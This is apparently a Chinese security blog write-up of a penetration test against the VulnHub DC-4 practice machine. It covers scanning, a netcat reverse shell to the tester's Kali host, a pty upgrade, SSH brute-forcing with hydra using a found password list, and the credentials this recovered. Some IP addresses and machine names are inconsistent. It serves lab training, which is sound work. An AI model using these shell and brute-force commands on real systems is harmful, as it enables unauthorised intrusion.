现在只对常读和星标的公众号才展示大图推送,建议大家能把GG安全“设为星标”,否则可能就看不到了啦!
免责声明
本文章仅用于分享信息安全防御技术,请遵守中华人民共和国相关法律法规,禁止进行任何违法犯罪行为。作者不承担因他人滥用本文所导致的任何法律责任。
本公众号及其发布的内容的使用者需自行承担由此产生的任何直接或间接的后果和损失,GG安全公众号和原文章作者不承担任何责任。如果出现任何后果,请使用者自行承担。如果有侵权行为,请告知我们,我们将立即删除并致以道歉。谢谢!
知识先导
GG安全
vulnhub靶场地址:www.vulnhub.com
DC系列简介:DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
前期准备
1、下载靶场
靶机名称:DC-4(包含1个flag)
下载地址:
https://www.vulnhub.com/entry/dc-4,313/
2、安装靶场
以DC-1为例,将文件解压(一压缩包形式进行下载)。
打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)
导入成功,开启此虚拟机( 当页面出现 DC-2 login 时表示安装成功)。
前提:DC-4和kali在同一网段
已知kali的IP地址(ifconfig)
—— kali IP地址:192.168.108.129/24
已知DC-2所在的网段
—— DC-4 IP地址:192.168.130.134/24
信息收集
信息收集
获取DC42的IP地址
命令:
netdiscover -r 192.168.108.0/24
nmap -sV -p- 192.168.108.134//-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描
获取信息如下:
|
端口号 |
服务 |
版本 |
|
22 |
ssh |
7.4p1 |
|
80 |
http |
nginx 1.15.10 |
渗透测试
修改kali的host文件(文件所在地址为:/etc/hosts)
补充:
vim /etc/hosts #编辑host文件(添加192.168.108.131 dc-2)cat /etc/hosts #查看host文件(修改之后进行查看)
访问80端口,并重新识别CMS
发现是一个登录框,可以输入账号密码,继续对其进行CMS的识别
python3 cmseek.py -u http://dc-4/
进行目录描扫,看看能不能拿到后台登陆的地址(实用工具dirb):
dirb http://dc-4
|
扫描URL: http://dc-4/ |
|
扫描结果: http://dc-4/css/ http://dc-4/images/ http://dc-4/index.php |
在使用searchsploit(kali自带的漏洞库)的时候发现了两个可以用户枚举的漏洞信息,查看并尝试使用看看能不能获取到ssh的用户信息
searchsploit -x linux/remote/45233.py 看了一下是一个python脚本,去脚本中给出的地址下载下来了,一看有很多依赖,没整太明白,还是先用burp抓包看一下
获取shell
ip add 
nc -e /bin/sh 192.168.108.129 6868
提权
由于 DC-4 还是只存在一个flag,所以这里不用想了还是需要进行提权,继续收集信息
python -c "import pty;pty.spawn('/bin/bash')"
可以明显看到在名为jim的用户文件夹里面有不一样的文件(重点查看)
很惊喜,居然看见了一个old-passwords.bak的文件,这很可能就是一个密码的备份文件
查看之后就是一个密码本(字典),并且包含了252个密码,可以尝试对ssh进行爆破了
hydra -l jim -P old-passwd.txt ssh://dc-4 -v -f -e nr -t 4# 为了加快我后期使用的是64线程
|
参数: |
|
|
-l user |
login 小写,指定用户名进行破解 |
|
-L file |
大写,指定用户的用户名字典 |
|
-p pass |
小写,用于指定密码破解,很少使用,一般采用密码字典 |
|
-P file |
大写,用于指定密码字典 |
|
-v / -V |
显示详细过程 |
|
-f |
找到第一对登录名或者密码的时候中止破解。 |
|
-e nsr |
nsr 额外的选项,n:空密码试探,s:使用指定账户和密码试探,r:密码是用户名的反写 |
|
-t 数字 |
tasks 同时运行的线程数,默认是16 |
成功得到了ssh
|
[22][ssh] |
host: dc-4 |
login: jim |
password: jibril04 |
su - 切换到jim账户去查看mbox文件
注意这次切换用户的时候用户名需要改成小写
在这里不小心退出去了,所以直接使用charles、^xHhA&hvim0y直接ssh登录了
获取flag
成功在/root/目录下拿到flag
猎杀时刻
✦
目前在GG安全公众号中回复关键字"CISP-PTE",即可获得CISP-PTE靶机打包套件。再次声明:本公众号及其发布的内容的使用者需自行承担由此产生的任何直接或间接的后果和损失,GG安全公众号和原文章作者不承担任何责任。
为了方便师傅们的交流学习,根据广大师傅们的建议,我在之后也会考虑创建一个的群聊。预计在内部群内,我们将分享一些脱敏的漏洞报告和渗透测试实战案例,还将会有一些经验丰富的大牛和巨佬分享他们的经验。后续还将提供一些福利,例如送书和小礼物等等。欢迎师傅们到时候加入群聊,一起交流学习,致力打造一个有丰富学习氛围的小圈子。
原文始发于微信公众号(GG安全):DC系列——DC4靶机渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论